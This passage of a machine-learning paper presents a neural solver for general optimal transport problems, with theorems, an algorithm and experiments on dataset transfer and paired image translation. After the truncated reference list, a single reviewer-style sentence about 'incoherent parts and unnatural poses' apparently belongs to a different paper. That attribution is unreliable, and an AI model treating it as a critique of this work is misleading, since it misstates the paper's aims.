[Villani](2008) §1 or [Santambrogio](2015) §1, 2). Recently, classic OT obtained the weak OT extension ([Gozlan et al.](2017), [Backhoff-Veraguas et al.](2019)). Consider $C : X \times P(Y) \to \mathbb{R}$, i.e., a weak cost function whose inputs are a point $x \in X$ and a distribution of $y \in Y$. The weak OT cost is $$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} \int_X C(x, \pi(\cdot | x)) d\pi(x),$$ where $\pi(\cdot | x)$ denotes the conditional distribution. Weak formulation (2) is reduced to classic formulation (1) when $C(x, \mu) = \int_Y c(x, y) d\mu(y)$. Another example of a weak cost function is the $\gamma$-weak quadratic cost $C(x, \mu) = \int_Y \frac{1}{2} \|x - y\|_2^2 d\mu(y) - \frac{\gamma}{2} \text{Var}(\mu)$, where $\gamma \geq 0$ and $\text{Var}(\mu)$ is the variance of $\mu$, see [Korotin et al.](2023b) Eq. 5, [Alibert et al.](2019) §5.2, [Gozlan & Juillet](2020) §5.2) for details. For this cost, we denote the optimal value of (2) by $W_{2,\gamma}$ and call it $\gamma$-weak Wasserstein-2. Regularized and general OT. The expression inside (1) is a linear functional. It is common to add a lower semi-continuous convex regularizer $R : M(X \times Y) \to \mathbb{R} \cup \{\infty\}$ with weight $\gamma > 0$: $$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} \left\{ \int_{X \times Y} c(x, y) d\pi(x, y) + \gamma R(\pi) \right\}.$$ Regularized OT formulation (3) typically provides several advantages over original formulation (1). For example, if $R(\pi)$ is strictly convex, the expression inside (3) is a strictly convex functional in $\pi$ and yields the unique OT plan $\pi^*$. Besides, regularized OT typically has better sample complexity ([Genevay](2019), [Mena & Niles-Weed](2019), [Genevay et al.](2019)). Common regularizers are the entropic ([Cuturi](2013)), quadratic ([Essid & Solomon](2018)), lasso ([Courty et al.](2016)), etc. To consider a general OT formulation, let $F : M(X \times Y) \to \mathbb{R} \cup \{+\infty\}$ be a convex lower semi-continuous functional. Assume that there exists $\pi \in \Pi(P, Q)$ for which $F(\pi) < \infty$. Let $$\text{Cost}(P, Q) \overset{\text{def}}{=} \inf_{\pi \in \Pi(P, Q)} F(\pi).$$ This problem is a generalization of classic OT (1), weak OT (2), and regularized OT (3). Following [Paty & Cuturi](2020), we call problem (4) a general OT problem. It admits a minimizer (OT plan) $\pi^*$ ([Paty & Cuturi](2020) Lemma 1). One may note that regularized OT (3) represents a similar problem: it is enough to put $c(x, y) \equiv 0$, $\gamma = 1$ and $R(\pi) = F(\pi)$ to obtain (4) from (3), i.e., regularized (3) and general OT (4) can be viewed as equivalent formulations. ### 3 RELATED WORK: DISCRETE AND CONTINUOUS OT SOLVERS Solving OT problems usually implies either finding an OT plan $\pi^*$ or the OT cost. Many approaches in generative learning use OT cost as the loss function to update generative models, such as WGANs ([Arjovsky & Bottou](2017), [Petzka et al.](2018), [Liu et al.](2019)), see [Korotin et al.](2022b) for a survey. These are not related to our work as they do not compute OT plans or maps. Existing computational OT plan methods can be roughly split into two groups: discrete and continuous. **Discrete OT** considers discrete distributions $\hat{P}_N = \sum_{n=1}^{N} p_n \delta_{x_n}$ and $\hat{Q}_M = \sum_{m=1}^{M} q_m \delta_{y_m}$ and aims to find the OT plan (1), (2), (4), (3) directly between $P = \hat{P}_N$ and $Q = \hat{Q}_M$. In this case, the OT plan $\pi^*$ can be represented as a doubly stochastic $N \times M$ matrix. For a survey of computational methods for discrete OT, we refer to [Peyré et al.](2019). In short, one of the most popular is the Sinkhorn algorithm ([Cuturi](2013)) which is designed to solve formulation (3) with the entropic regularization. General discrete OT is extensively studied ([Nash](2000), [Courty et al.](2016), [Flamary et al.](2021), [Ferradans et al.](2014), [Rakotomamonjy et al.](2015)): these methods are often employed in domain adaptation problems ([Courty et al.](2016)). Additionally, the available labels can be used to reconstruct the classic cost function, to capture the underlying data structure ([Courty et al.](2016), [Stuart & Wolfram](2020), [Liu et al.](2020), [Li et al.](2019)). The major drawback of discrete OT methods is that they only perform a (stochastic) matching between the given empirical samples and usually do not provide out-of-sample estimates. This limits their application to real-world scenarios where new (test) samples frequently appear. Recent works ([Hütter & Rigollet](2021), [Pooladian & Niles-Weed](2021), [Manole et al.](2021), [Deb et al.](2021)) consider the OT problem with the quadratic cost and develop out-of-sample estimators by wavelet/kernel-based plugin estimators or by the barycentric projection of the discrete entropic OT plan. In spite of tractable theoretical properties, the performance of such methods in high dimensions is questionable. **Continuous OT** usually considers \( p_n = \frac{1}{N} \) and \( q_m = \frac{1}{M} \) and assumes that the given discrete distributions \( \hat{P}_N = \frac{1}{N} \sum_{n=1}^{N} \delta_{x_n} \), \( \hat{Q}_M = \frac{1}{M} \sum_{m=1}^{M} \delta_{y_m} \) are the empirical counterparts of the underlying distributions \( P, Q \). That is, the goal of continuous OT is to recover the OT plan between \( P, Q \) which are accessible only by their (finite) empirical samples \( \{x_1, x_2, \ldots, x_N\} \sim P \) and \( \{y_1, y_2, \ldots, y_M\} \sim Q \). In this case, to represent the plan one has to employ parametric approximations of the OT plan \( \pi^* \) or dual potentials \( u^*, v^* \) which, in turn, provide straightforward out-of-sample estimates. A notable development is the use of neural networks to compute OT maps for solving weak (2) and classic (1) functionals (Korotin et al., 2023b; 2022a; 2021b; Rout et al., 2022; Fan et al., 2023; Henry-Labordere, 2019). Previous OT methods were based on formulations restricted to convex potentials (Makkuva et al., 2020; Korotin et al., 2021a,c; Mokrov et al., 2021; Fan et al., 2023; Bunne et al., 2021; Alvarez-Melis et al., 2022), and used Input Convex Neural Networks (ICNN) to approximate them, which limited the application of OT in large-scale tasks (Korotin et al., 2021b; Fan et al., 2022; Korotin et al., 2022a). In (Genevay et al., 2016; Seguy et al., 2018; Daniels et al., 2021; Fan et al., 2022), the authors propose methods for \( f \)-divergence regularized costs (3). While the **discrete** version of the general OT problem (4) is well studied in the literature, its continuous counterpart is not yet analyzed. In our work, we fill this gap by proposing the algorithm to solve the (continuous) **general** OT problem (4), provide error bounds (§4.2). As an illustration, we construct examples of general cost functionals which can take into account the available task-specific information as labels (§5.1) or pairs (§5.2). ### 4 Maximin Reformulation of the General OT In this section, we derive a saddle point formulation for the general OT problem (4) which we later solve with neural networks. All the proofs of the statements are given in Appendix A. #### 4.1 General OT Maximin Reformulation via Stochastic Maps In this subsection, we derive the dual form for (4), which can be used to get the OT plan \( \pi^* \). Our formulation utilizes the implicit representation for plans \( \Pi(P) \) via stochastic maps, an idea inspired by (Korotin et al., 2023b §4.1). We introduce a latent space \( Z = \mathbb{R}^Z \) and an atomless distribution \( S \in \mathcal{P}(Z) \) on it, e.g., \( S = N(0, I_Z) \). For every \( \pi \in \mathcal{P}(X \times Y) \), there exists a measurable function \( T = T_\pi : X \times Z \to Y \) which implicitly represents it. Such \( T_\pi \) satisfies \( T_\pi(x, \cdot) \sharp S = \pi(\cdot | x) \) for all \( x \in X \). That is, given \( x \in X \) and a random latent vector \( z \sim S \), the function \( T \) produces sample \( T_\pi(x, z) \sim \pi(y | x) \). In particular, if \( x \sim P \), the random vector \( [x, T_\pi(x, z)] \) is distributed as \( \pi \). Thus, every \( \pi \in \Pi(P) \) can be implicitly represented (non-uniquely) as a function \( T_\pi : X \times Z \to Y \). And vice-versa, every measurable function \( T : X \times Z \to Y \) is an implicit representation of the distribution \( \pi_T \) which is the joint distribution of a random vector \( [x, T(x, z)] \) with \( x \sim P, z \sim S \). Our two following theorems constitute the main theoretical idea of our approach. They are proven for separably *-increasing functionals \( F \) (see the Definition [A] in Appendix A). Note that one can eliminate this restriction by taking the advantage of the minimax theorems (Terkelsen, 1972). **Theorem 1** (Maximin reformulation of the general OT). For separably *-increasing convex and lower semi-continuous functional \( F : \mathcal{M}(X \times Y) \to \mathbb{R} \cup \{+\infty\} \) it holds (we identify \( \tilde{F}(T) \) def \( F(\pi_T) \)): \[ \text{Cost}(P, Q) = \sup_v \inf_T L(v, T) \overset{\text{def}}{=} \sup_v \inf_T \left\{ \tilde{F}(T) - \int_{X \times Z} v(T(x, z)) dP(x) dS(z) + \int_Y v(y) dQ(y) \right\}, \] where the sup is taken over potentials \( v \in C(Y) \) and inf – over measurable functions \( T : X \times Z \to Y \). From (5) we also see that it is enough to consider values of \( F \) in \( \pi_T \in \Pi(P) \). For convention, in further derivations we always consider \( \tilde{F}(T_\pi) = F(\pi) = +\infty \) for \( \pi \in \mathcal{M}(X \times Y) \setminus \Pi(P) \). We say that \( T^* \) is a **stochastic OT map** if it represents some OT plan \( \pi^* \) solving (4), i.e., \( T^*(x, \cdot) \sharp S = \pi^*(\cdot | x) \) holds \( P \)-almost surely for all \( x \in X \). **Theorem 2** (Optimal saddle points provide stochastic OT maps). Let \( v^* \in \arg \sup_v \inf_T L(v, T) \) be any optimal potential. Then for every stochastic OT map \( T^* \) it holds: \[ T^* \in \arg \inf_T L(v^*, T). \] Furthermore, if \( F \) is strictly convex in \( \pi \), then (4) permits the unique OT plan \( \pi^* \). In this case, \( T^* \in \arg\inf_T L(v^*, T) \iff T^* \) is a stochastic OT map. From our results it follows that by solving (5) and obtaining an optimal saddle point \((v^*, T^*)\), one gets a stochastic OT map \( T^* \). To ensure that all the solutions are OT maps, one may consider adding strictly convex regularizers to \( F \) with a small weight, e.g., conditional interaction energy, see Appendix D which is also known as the conditional kernel variance [Korotin et al., 2023a]. **Practical considerations.** Every term in (5) can be estimated with Monte Carlo by using random empirical samples from \( P, Q \), allowing us to approach the general OT problem (4) in the continuous setting (\( \mathbb{R}^D \times \mathbb{R}^S \to \mathbb{R}^D \)). To solve the problem (5) in practice, one may use neural nets \( T_\theta : \mathbb{R}^D \times \mathbb{R}^S \to \mathbb{R}^D \) and \( v_\phi : \mathbb{R}^D \to \mathbb{R} \) to parametrize \( T \) and \( v \), respectively. To train them, one may employ stochastic gradient ascent-descent (SGAD) by using random batches from \( P, Q, S \). We summarize the optimization procedure for general cost functionals \( F \) in Algorithm 2 of Appendix B. In the text below (§5.1), we focus on the special cases of the class-guided functional \( F_G \), which is targeted to be used in the dataset transfer task (Figure 2) and pair-guided functional \( F_S \) for supervised image-to-image style transfer (§5.2). **Relation to prior works.** Maximin reformulations analogous to our (5) appear in the continuous OT literature [Korotin et al., 2021c; 2023b; Rout et al., 2022; Fan et al., 2023], yet they are designed only for classic (1) and weak (2) OT. Our formulation is generic and automatically subsumes all of them. It allows using general cost functionals \( F \) which, e.g., may easily take into account side information. ### 4.2 Error Bounds for Approximate Solutions for General OT For a pair \((\hat{v}, \hat{T})\) approximately solving (5), it is natural to ask how close is \( \pi_{\hat{T}} \) to the OT plan \( \pi^* \). Based on the duality gaps, i.e., errors for solving outer and inner optimization problems with \((\hat{v}, \hat{T})\) in (5), we give an upper bound on the difference between \( \pi_{\hat{T}} \) and \( \pi^* \). Our analysis holds for functionals \( F \) which are strongly convex in some metric \( \rho(\cdot, \cdot) \), see Definition 2 in Appendix A. Recall that the strong convexity of \( F \) also implies the strict convexity, i.e., the OT plan \( \pi^* \) is unique. **Theorem 3** (Error analysis via duality gaps for stochastic maps). Let \( F : M(X \times Y) \to \mathbb{R} \cup \{+\infty\} \) be a convex cost functional. Let \( \rho(\cdot, \cdot) \) be a metric on \( \Pi(P) \subset M(X \times Y) \). Assume that \( F \) is \( \beta \)-strongly convex in \( \rho \) on \( \Pi(P) \). Consider the duality gaps for an approximate solution \((\hat{v}, \hat{T})\) of (5): \[ \varepsilon_1(\hat{v}, \hat{T}) \overset{\text{def}}{=} L(\hat{v}, \hat{T}) - \inf_T L(\hat{v}, T), \] \[ \varepsilon_2(\hat{v}) \overset{\text{def}}{=} \sup_v \inf_T L(v, T) - \inf_T L(\hat{v}, T), \] which are the errors of solving the outer sup\( _v \) and inner inf\( _T \) problems in (5), respectively. Then for OT plan \( \pi^* \) in (4) between \( P \) and \( Q \) the following inequality holds: \[ \rho(\pi_{\hat{T}}, \pi^*) \leq \sqrt{\frac{2}{\beta}} \left( \sqrt{\varepsilon_1(\hat{v}, \hat{T})} + \sqrt{\varepsilon_2(\hat{v})} \right), \] i.e., the sum of the roots of duality gaps upper bounds the error of the plan \( \pi_{\hat{T}} \) w.r.t. \( \pi^* \) in \( \rho(\cdot, \cdot) \). The significance of our Theorem 3 is manifested when moving from the theoretical objective (5) to its numerical counterpart. In practice, the dual potential \( v \) in (5) is parameterized by NNs (a subset of continuous functions) and may not reach the optimizer \( v^* \). Our duality gap analysis shows that we can still find a good approximation of the OT plan. It suffices to find a pair \((\hat{v}, \hat{T})\) that achieves nearly optimal objective values in the inner inf\( _T \) and outer sup\( _v \) problems of (5). In such a pair, \( \pi_{\hat{T}} \) is close to the OT plan \( \pi^* \). To apply our duality gap analysis, the strong convexity of \( F \) is required. We give an example of a strongly convex regularizer and a general recipe for using it in Appendix D. In turn, Appendix D.1 demonstrates the application of this regularization technique in practice. **Relation to prior works.** The authors of [Fan et al., 2023], [Rout et al., 2022], [Makkuva et al., 2020] carried out error analysis via duality gaps resembling our Theorem 3. Their error analysis works only for classic OT (1) and requires the potential \( \hat{v} \) to satisfy certain convexity properties. Our error analysis is free from assumptions on \( \hat{v} \) and works for general OT (4) with strongly convex \( F \). ### 5 Learning with General Cost Functionals In this section, we show class-guided general cost functional §5.1 for dataset transfer problem §6.1 and pair-guided cost functional §5.2 for supervised image-to-image translation §6.2. Algorithm 1: Neural optimal transport with the class-guided cost functional $\tilde{F}_G$. Input : Distributions $P = \sum_n \alpha_n P_n$, $Q = \sum_n \beta_n Q_n$, $S$ accessible by samples (unlabeled); weights $\alpha_n$ are known and samples from each $P_n$, $Q_n$ are accessible (labeled); mapping network $T_\theta : \mathbb{R}^P \times \mathbb{R}^S \rightarrow \mathbb{R}^Q$; potential network $v_\omega : \mathbb{R}^Q \rightarrow \mathbb{R}$; number of inner iterations $K_T$; Output : Learned stochastic OT map $T_\theta$ representing an OT plan between distributions $P$, $Q$; repeat Sample (unlabeled) batches $Y \sim Q$, $X \sim P$ and for each $x \in X$ sample batch $Z[x] \sim S$; $L_v \leftarrow \sum_{x \in X} \sum_{z \in Z[x]} v_\omega(T_\theta(x,z)) - \sum_{y \in Y} v_\omega(y)$; Update $\omega$ by using $\frac{\partial L_v}{\partial \omega}$; for $k_T = 1, 2, \ldots, K_T$ do Pick $n \in \{1, 2, \ldots, N\}$ at random with probabilities $(\alpha_1, \ldots, \alpha_N)$; Sample (labeled) batches $X_n \sim P_n$, $Y_n \sim Q_n$; for each $x \in X$ sample batch $Z_n[x] \sim S$; $L_T \leftarrow \Delta E^2(X_n, T(X_n, Z_n), Y_n) - \sum_{x \in X_n} \sum_{z \in Z_n[x]} v_\omega(T_\theta(x,z))$; Update $\theta$ by using $\frac{\partial L_T}{\partial \theta}$; until not converged; 5.1 Class-Guided Cost Functional To begin with, we theoretically formalize the problem setup. Let each input $P$ and output $Q$ distributions be a mixture of $N$ distributions (classes) $\{P_n\}_{n=1}^N$ and $\{Q_n\}_{n=1}^N$, respectively. That is $P = \sum_{n=1}^N \alpha_n P_n$ and $Q = \sum_{n=1}^N \beta_n Q_n$ where $\alpha_n, \beta_n \geq 0$ are the respective weights (class prior probabilities) satisfying $\sum_{n=1}^N \alpha_n = 1$ and $\sum_{n=1}^N \beta_n = 1$. In this general setup, we aim to find the transport plan $\pi(x,y) \in \Pi(P,Q)$ for which the classes of $x \in X$ and $y \in Y$ are the same for as many pairs $(x,y) \sim \pi$ as possible. That is, its respective stochastic map $T$ should map each component $P_n$ (class) of $P$ to the respective component $Q_n$ (class) of $Q$. The task above is related to domain adaptation or transfer learning problems. It does not always have a solution with each $P_n$ exactly mapped to $Q_n$ due to possible prior/posterior shift [Kouw & Loog, 2018]. We aim to find a stochastic map $T$ between $P$ and $Q$ satisfying $T_\sharp(P_n \times S) \approx Q_n$ for all $n = 1, \ldots, N$. To solve the above-discussed problem, we propose the following functional: $$F_G(\pi) = \tilde{F}_G(T_\pi) \overset{\text{def}}{=} \sum_{n=1}^N \alpha_n E^2(T_\pi \sharp(P_n \times S), Q_n),$$ where $E$ denotes the energy distance (8). For two distributions $Q, Q' \in \mathcal{P}(Y)$ with $Y \subset \mathbb{R}^D$, the (square of) energy distance $E$ [Rizzo & Székely, 2016] between them is: $$E^2(Q, Q') = \mathbb{E}\|Y_1 - Y_2\|^2 - \frac{1}{2}\mathbb{E}\|Y_1 - Y'_1\|^2 - \frac{1}{2}\mathbb{E}\|Y_2 - Y'_2\|^2,$$ where $Y_1 \sim Q, Y'_1 \sim Q', Y_2 \sim Q, Y'_2 \sim Q'$ are independent random vectors. Energy distance (8) is a particular case of the Maximum Mean Discrepancy [Sejdinovic et al., 2013]. It equals zero only when $Q_1 = Q_2$. Hence, our functional (7) is non-negative and attains zero value when the components of $P$ are correctly mapped to the respective components of $Q$ (if this is possible). Theorem 4 (Properties of the class-guided cost functional $F_G$). Functional $F_G(\pi)$ is convex in $\pi \in \Pi(P)$, lower semi-continuous and $*$-separably increasing. In practice, each of the terms $E^2(T_\pi \sharp(P_n \times S), Q_n)$ in (7) admits estimation from samples from $\pi$. Proposition 1 (Estimator for $E^2$). Let $X_n \sim P_n$ be a batch of $K_X$ samples from class $n$. For each $x \in X_n$ let $Z_n[x] \sim S$ be a latent batch of size $K_Z$. Consider a batch $Y_n \sim Q_n$ of size $K_Y$. Then $$\Delta E^2(X_n, T(X_n, Z_n), Y_n) \overset{\text{def}}{=} \sum_{y \in Y_n} \sum_{x \in X_n} \sum_{z \in Z_n[x]} \|y - T(x,z)\|^2 - \sum_{x \in X_n} \sum_{z \in Z_n[x]} \sum_{x' \in X_n \setminus \{x\}} \sum_{z' \in Z_{x'}} \|T(x,z) - T(x',z')\|^2$$ $$2 \cdot (K_X^2 - K_X) \cdot K_Z$$ (9) is an estimator of \( \mathcal{E}^2(T_n^*(\mathbb{P}_n \times \mathbb{S}), Q_n) \) up to a constant \( T \)-independent shift. To estimate \( \mathcal{F}_G(T) \), one may separately estimate terms \( \mathcal{E}^2(T_n^*(\mathbb{P}_n \times \mathbb{S}), Q_n) \) for each \( n \) and sum them up with weights \( \alpha_n \). We only estimate \( n \)-th term with probability \( \alpha_n \) at each iteration. We highlight the two key details of the estimation of (7) which are significantly different from the estimation of classic (1) and weak OT costs (2) appearing in related works (Korotin et al., 2023b, 2021b; Fan et al., 2023). First, one has to sample not just from the input distribution \( \mathbb{P} \), but separately from each its component (class) \( \mathbb{P}_n \). Moreover, one also has to be able to separately sample from the target distribution’s \( Q \) components \( Q_n \). This is the part where the guidance (semi-supervision) happens. We note that to estimate costs such as classic or weak (2), no target samples from \( Q \) are needed at all, i.e., they can be viewed as unsupervised. In practice, we assume that the learner is given a labelled empirical sample from \( \mathbb{P} \) for training. In contrast, we assume that the available samples from \( Q \) are only partially labelled (with \( \geq 1 \) labelled data point per class). That is, we know the class label only for a limited amount of data (Figure 2). In this case, all \( n \) cost terms (9) can still be stochastically estimated. These cost terms are used to learn the transport map \( T_\theta \) in Algorithm 2. The remaining (unlabeled) samples will be used when training the potential \( v_\omega \), as labels are not needed to update the potential in (5). We provide the detailed procedure for learning with the functional \( \mathcal{F}_G(7) \) in Algorithm 1. ### 5.2 Pair-Guided Cost Functional In this section, we demonstrate general OT formulation with another practically-appealing specification. In particular, we define the pair-guided general OT cost functional. For a given paired data set \((x_1, y^*(x_1)), \ldots, (x_N, y^*(x_N))\) with samples \( X_{1:N} = \{x_1, \ldots, x_N\} \) and \( y^*(X_{1:N}) = \{y^*(x_1), \ldots, y^*(x_N)\} \) which are assumed to follow the source \( \mathbb{P} \) and target \( \mathbb{Q} \) distributions, respectively, we introduce: \[ \mathcal{F}_S(\pi) \overset{\text{def}}{=} \int_{X \times Y} \ell(y, y'(x)) d\pi(x, y). \] The function \( \ell : X \times Y \to \mathbb{R} \) is an appropriate loss measuring the difference between samples. In the majority of our experiments we choose \( \ell(y, y') = \|y - y'\|_2 \). In practice, to estimate (10) we assume that the learner is given a labelled empirical sample of \( \mathbb{P} \) and \( \mathbb{Q} \) for training. Using the cost (10), which can handle such information, we can train optimal mapping in a supervised manner. In §6.2, we show how our method, together with the pair-guided functional \( \mathcal{F}_S \), is directly applicable to the paired image-to-image translation problem. ### 6 Experimental Illustrations Our Algorithm 1 is capable of learning both stochastic (one-to-many) \( T(x, z) \) and deterministic (one-to-one) \( T(x, z) \equiv T(x) \) transport maps. For the latter, no random noise \( z \) is added to input. First, we implement stochastic and deterministic maps along with our class-guided cost function \( \mathcal{F}_G \), to address the dataset transfer problem (§6.1). Second, using the deterministic transport map \( T(x) \), we apply our pair-guided functional \( \mathcal{F}_S \) to solve the image-to-image supervised translation (§6.2). In the Appendix we provide experiments with toy data C.2, biological batch effect problem C.13 and various paired image-to-image datasets E. The code for the experiments can be found at https://github.com/machinestein/gnot. #### 6.1 Class-Guided Experiments **Datasets.** We use MNIST (LeCun & Cortes, 2010), FashionMNIST (Xiao et al., 2017) and MNIST-M (Ganin & Lempitsky, 2015) datasets as \( \mathbb{P}, \mathbb{Q} \). Each dataset has 10 (balanced) classes and the pre-defined train-test split. In this experiment, the goal is to find a class-wise map between unrelated domains: FMNIST \( \rightarrow \) MNIST and MNIST \( \rightarrow \) MNIST-M. We use the default class correspondence between the datasets. For completeness, in Appendices we provide additional results with imbalanced classes C.8, non-default correspondence C.11, and other datasets C. **Baselines.** We compare our method to the pixel-level adaptation methods such as (one-to-many) AugCycleGAN (Almahairi et al., 2018; Zhu et al., 2017; Hoffman et al., 2018; Almahairi et al., 2018) and MUNIT (Huang et al., 2018; Liu et al., 2017). We use the official implementations with the hyperparameters from the respective papers. We test Neural OT (Korotin et al., 2023b; Fan et al., 2023) with Euclidean cost functions: the quadratic cost \( \frac{1}{2} \|x - y\|^2_2 (\mathcal{W}_2) \) and the \( \gamma \)-weak (one-to-many) quadratic cost \( (\mathcal{W}_{2,\gamma}, \gamma = \frac{1}{10}) \). For semi-supervised mapping, we considered (one-to-one) Figure 3: The results of class-preserving mapping between two unrelated (left) and related (right) datasets. Each column shows the transfer result of a random (test) input \( x \sim P_n \) (first row) from a particular class (\( n = 0, 1, \ldots, 9 \)). Each row shows the results of transfer via a particular method. For methods which learn a stochastic map \( T(x, z) \), we show their output \( T(x, z) \) for a random noise \( z \). | Datasets (32 × 32) | Image-to-Image Translation | Flows | Discrete OT | Neural Optimal Transport | |-------------------|---------------------------|-------|-------------|--------------------------| | | MUNIT | Aug CycleGAN | OTDD | SinkhornLpL1 | \( W_2 \) | \( W_2, \gamma \) | \( F_G \), no \( z \) | \( F_G \) | | FMNIST → MNIST | 8.93 | 12.03 | 10.28 | 10.67 | 10.96 | 8.02 | 82.79 | 83.22 | | MNIST → MNIST-M | 97.95 | 98.2 | - | 83.26 | 38.77 | 37.0 | 95.27 | 94.62 | Table 1: Accuracy\(^{\dagger}\) of the maps learned by the translation methods in view. | Datasets (32 × 32) | Image-to-Image Translation | Flows | Discrete OT | Neural Optimal Transport | |-------------------|---------------------------|-------|-------------|--------------------------| | | MUNIT | Aug CycleGAN | OTDD | SinkhornLpL1 | \( W_2 \) | \( W_2, \gamma \) | \( F_G \), no \( z \) | \( F_G \) | | FMNIST → MNIST | 7.91 | 26.35 | > 100 | > 100 | 7.51 | 7.02 | 7.14 | 5.26 | | MNIST → MNIST-M | 11.68 | 26.87 | - | > 100 | 19.43 | 17.48 | 18.56 | 6.67 | Table 2: FID\(_{\downarrow}\) of the samples generated by the translation methods in view. OTDD flow ([Alvarez-Melis & Fusi, 2021; 2020](#)). This method employs gradient flows to perform the transfer preserving the class label. We also examine a General Discrete OT (DOT) which use labels. In particular, we adopted the solver from `ot.d` ([Flamary et al., 2021](#)) with its default out-of-sample estimation procedure. The solver utilizes the Sinkhorn ([Cuturi, 2013](#)) with Laplacian cost regularization ([Courty et al., 2016](#)). We show the results of ICNN-based OT method ([Makkuva et al., 2020](#); [Korotin et al., 2021a](#)) in Appendix C.9. **Metrics.** All the models are fitted on the train parts of datasets; all the provided qualitative and quantitative results are exclusively for test (unseen) data. To evaluate the visual quality, we compute FID ([Heusel et al., 2017](#)) of the entire mapped source test set w.r.t. the entire target test set. To estimate the accuracy of the mapping we use a pre-trained ResNet18 ([He et al., 2016](#)) classifier (with 95+ accuracy) on the target data. We consider the mapping \( T \) to be correct if the predicted label for the mapped sample \( T(x, z) \) matches the corresponding label of \( x \). **Results.** Qualitative results are shown in Figure 3, FID, accuracies – in Tables 2 and 1, respectively. To keep the figures simple, for all the models (one-to-one, one-to-many), we plot a single output per input. For completeness, in Appendices C.5–C.6 we show multiple outputs per each input for our method, and in Appendix C.7 we provide ablation study on \( Z \) size. Our method, general discrete OT and OTDD, use 10 labeled samples for each class in the target. Other baselines lack the capability to use label information. As seen in Figure 3 and Table 1, our approach preserves the class-wise structure accurately with just 10 labelled samples per class. The accuracy of other neural OT methods is around 10%, equivalent to a random guess. Both the general discrete OT and OTDD methods do not preserve the class structure in high dimensions, resulting in samples with poor FID, see table 2. Visually, the OTDD results are comparable to those in Figure 3 of ([Alvarez-Melis & Fusi, 2021](#)). 6.2 Pair-Guided Experiments Datasets and metrics. We utilize three popular datasets for our evaluation: Comic-Faces-V1, Edges-to-Shoes (Isola et al., 2017), and CelebAMask-HQ (Lee et al., 2020). These datasets all contain pairs of images (handmade or formulated synthetically) and are commonly employed in benchmarking supervised image translation methods. For all experiments, we operated at the resolution of $256 \times 256$ pixels. All the results (qualitative, quantitative) are on the test sets in accordance with the default train-test splits for the datasets. As the metric, we use the test FID (as in §6.1). Baselines. As the baselines, we consider the basic (unsupervised) NOT algorithm (Korotin et al., 2023b), RMSE regression, and well-celebrated supervised Pix2Pix method (Isola et al., 2017). Details. In our method, we use U2Net as the transport map $T_\theta(x)$ and WGAN-QC discriminator’s ResNet architecture (He et al., 2016) for potential $v_\omega$. In Comic-Faces-V1 and Edges-to-Shoes experiments, we use RMSE as the function $\ell$ in our method. In CelebAMask-HQ case, we use a VGG-based perceptual loss. Other details are given in Appendix §E.3. Results. The evaluation results and comparisons with the baselines for the Comic-Faces-V1 and Edges-to-Shoes datasets are presented in Figure 4 and Figure 21 respectively. Additionally, the computed FID scores for these datasets are detailed in Table 2 in the appendix. For CelebAMask-HQ dataset, we achieve the FID score of 21.1. The examples of generated images are provided in Figures 1 and 22. Further qualitative experimentation is conducted on the Comic-Faces-V1 dataset at a higher resolution of $512 \times 512$, see Figure 23. Overall, the obtained results show that our method achieves competitive quality and can be further applied to high quality generation and editing tasks. 7 Discussion Our method is a generic tool to learn transport maps between data distributions with a task-specific cost functional $\mathcal{F}$. In general, the potential impact of our work on society depends on the scope of its application in digital content creation. As a limitation, we can consider the fact that to apply our method, one has to provide an estimator $\hat{\mathcal{F}}(T)$ for the functional $\mathcal{F}$ which may be non-trivial. Besides, the construction of a cost functional $\mathcal{F}$ for a particular downstream task may be not straightforward. This should be taken into account when using the method in practice. Constructing task-specific functionals $\mathcal{F}$ and estimators $\hat{\mathcal{F}}$ is a promising future research avenue. 8 ACKNOWLEDGEMENT The work was supported by the Analytical center under the RF Government (subsidy agreement 000000D730321P5Q0002, Grant No. 70-2021-00145 02.11.2021). REFERENCES J-J Alibert, Guy Bouchitté, and Thierry Champion. A new class of costs for optimal transport planning. European Journal of Applied Mathematics, 30(6):1229–1263, 2019. Amjad Almahairi, Sai Rajeshwar, Alessandro Sordoni, Philip Bachman, and Aaron Courville. Augmented cyclegan: Learning many-to-many mappings from unpaired data. In International Conference on Machine Learning, pp. 195–204. PMLR, 2018. David Alvarez-Melis and Nicolo Fusi. Geometric dataset distances via optimal transport. Advances in Neural Information Processing Systems, 33:21428–21439, 2020. David Alvarez-Melis and Nicolò Fusi. Dataset dynamics via gradient flows in probability space. In International Conference on Machine Learning, pp. 219–230. PMLR, 2021. David Alvarez-Melis, Yair Schiff, and Youssef Mroueh. Optimizing functionals on the space of probabilities with input convex neural networks. Transactions on Machine Learning Research, 2022. Brandon Amos, Lei Xu, and J Zico Kolter. Input convex neural networks. In Proceedings of the 34th International Conference on Machine Learning-Volume 70, pp. 146–155. JMLR. org, 2017. Martin Arjovsky and Léon Bottou. Towards principled methods for training generative adversarial networks. arXiv preprint arXiv:1701.04862, 2017. Julio Backhoff-Veraguas, Mathias Beiglböck, and Gudmun Pammer. Existence, duality, and cyclical monotonicity for weak transport costs. Calculus of Variations and Partial Differential Equations, 58(6):1–28, 2019. Lukas Biewald. Experiment tracking with weights and biases, 2020. URL https://www.wandb.com/. Software available from wandb.com. Nicolas Bonneel and Julie Digne. A survey of optimal transport for computer graphics and computer vision. In Computer Graphics Forum, 2023. Victor Bouniakowsky. Sur quelques inégalités concernant les intégrales ordinaires et les intégrales aux différences finies, volume 1. Mem. Acad. St. Petersburg, 1859. Charlotte Bunne, Laetitia Meng-Papaxanthos, Andreas Krause, and Marco Cuturi. Jkonet: Proximal optimal transport modeling of population dynamics, 2021. Nicolas Courty, Rémi Flamary, Devis Tuia, and Alain Rakotomamonjy. Optimal transport for domain adaptation. IEEE transactions on pattern analysis and machine intelligence, 39(9):1853–1865, 2016. Marco Cuturi. Sinkhorn distances: Lightspeed computation of optimal transport. In Advances in neural information processing systems, pp. 2292–2300, 2013. Grady Daniels, Tyler Maunu, and Paul Hand. Score-based generative neural networks for large-scale optimal transport. Advances in Neural Information Processing Systems, 34, 2021. Nabarun Deb, Promit Ghosal, and Bodhisattva Sen. Rates of estimation of optimal transport maps using plug-in estimators via barycentric projections. Advances in Neural Information Processing Systems, 34:29736–29753, 2021. Montacer Essid and Justin Solomon. Quadratically regularized optimal transport on graphs. SIAM Journal on Scientific Computing, 40(4):A1961–A1986, 2018.
duyA42HlCK
The paper's objective is to address incoherent parts and unnatural poses. However, it falls short in terms of providing quantitative metrics to evaluate the effectiveness of the proposed method in addressing these issues.
